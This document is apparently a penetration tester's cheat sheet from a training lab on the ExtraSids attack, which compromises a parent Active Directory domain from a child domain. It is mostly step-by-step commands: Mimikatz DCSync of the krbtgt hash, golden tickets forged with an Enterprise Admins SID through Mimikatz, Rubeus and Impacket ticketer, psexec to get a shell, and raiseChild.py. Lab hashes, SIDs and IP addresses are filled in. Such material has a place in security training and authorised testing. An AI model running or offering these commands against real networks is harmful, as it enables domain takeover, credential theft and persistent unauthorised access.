ExtraSids

Windows

The sidHistory attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain.

SID history is intended to work across domains, but can work in the same domain. Using Mimikatz, an attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. When logging in with this account, all of the SIDs associated with the account are added to the user's token.

This token is used to determine what resources the account can access. If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a Golden Ticket or a Kerberos ticket-granting ticket (TGT), which will allow for us to authenticate as any account in the domain of our choosing for further persistence

ExtraSids-Mimikatz

This attack allows for the compromise of a parent domain once the child domain has been compromised. Within the same AD forest, the sidHistory property is respected due to a lack of SID Filtering protection. Therefore, if a user in a child domain that has their sidHistory set to the Enterprise Admins group (which only exists in the parent domain), they are treated as a member of this group, which allows for administrative access to the entire forest. In other words, we are creating a Golden Ticket from the compromised child domain to compromise the parent domain. In this case, we will leverage the SIDHistory to grant an account (or non-existent account) Enterprise Admin rights by modifying this attribute to contain the SID for the Enterprise Admins group, which will give us full access to the parent domain without actually being part of the group.

First, we need to obtain the NT hash for the KRBTGT account, which is a service account for the Key Distribution Center (KDC) in Active Directory. The account KRB (Kerberos) TGT (Ticket Granting Ticket) is used to encrypt/sign all Kerberos tickets granted within a given domain. Domain controllers use the account's password to decrypt and validate Kerberos tickets. The KRBTGT account can be used to create Kerberos TGT tickets that can be used to request TGS tickets for any service on any host in the domain. This is also known as the Golden Ticket attack and is a well-known persistence mechanism for attackers in Active Directory environments. The only way to invalidate a Golden Ticket is to change the password of the KRBTGT account, which should be done periodically and definitely after a penetration test assessment where full domain compromise is reached.

We need following:

• The KRBTGT hash for the child domain

• The SID for the child domain

• The name of a target user in the child domain (does not need to exist!)

• The FQDN of the child domain.

• The SID of the Enterprise Admins group of the root domain.

• With this data collected, the attack can be performed with Mimikatz.

1. DCSync to get NT Hash:

lsadump::dcsync /user:LOGISTICS\krbtgt

We can either find the SID of child domain from the output of mimikatz Or get both from:

lsadump::trust /patch

We can use powerview too:

Get-DomainSID

or

Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"

1. Enterprise Admins Group's SID

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

To confirm no access check:

ls \\academy-ea-dc01.inlanefreight.local\c$

1. Create Golden Ticket

Mimikatz:

mimikatz.exe

kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

Add -519 to SIDs

Rubeus:

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

user can be made up or Administrator

Then check if it is in memory with klist

Now we can use ls:

ls \\academy-ea-dc01.inlanefreight.local\c$

DCSync

For example targetting lab_adm:

lsadump::dcsync /user:INLANEFREIGHT\lab_adm

When dealing with multiple domains and our target domain is not the same as the user's domain, we will need to specify the exact domain to perform the DCSync operation on the particular domain controller. The command for this would look like the following:

lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL

or

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

If dcsync is not working try:

dir \\trusteddc.trusted.vl\c$\

Then:

$sess = new-pssession -computername trusteddc.trusted.vl

or remove -computername

enter-pssession $sess

Linux

Grab krbtgt hash:

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

Get SID of child domain:

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 

can also grep

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"

Get Enterprise Domain SID

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

ADD -519 AT THE END

Golden TIcket

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

Pop a shell

export KRB5CCNAME=hacker.ccache 

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

Escalating from child to parent domain We need to specify the target domain controller and credentials for an administrative user in the child domain

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm